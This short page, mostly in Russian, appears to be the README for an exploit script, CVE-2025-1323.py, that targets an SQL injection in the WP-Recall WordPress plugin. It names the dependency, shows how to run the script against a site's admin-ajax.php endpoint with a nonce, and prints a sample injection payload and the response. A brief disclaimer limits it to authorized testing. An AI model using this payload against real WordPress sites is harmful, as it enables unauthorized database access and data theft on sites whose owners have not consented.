
WP-Recall Plugin SQL Injection
SQL-инъекция в плагине WP-Recall
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Не используйте против систем без явного разрешения. Неправомерное использование может быть незаконным.
requestsУстановка зависимостей:
pip install requests
python CVE-2025-1323.py
Введите целевой URL (например, https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php Введите значение ajax_nonce: 37c11b0c06
[*] Отправка полезной нагрузки: '; SELECT user(); --
[+] Получен ответ: {"result":"Ошибка SQL или утекшие данные здесь..."}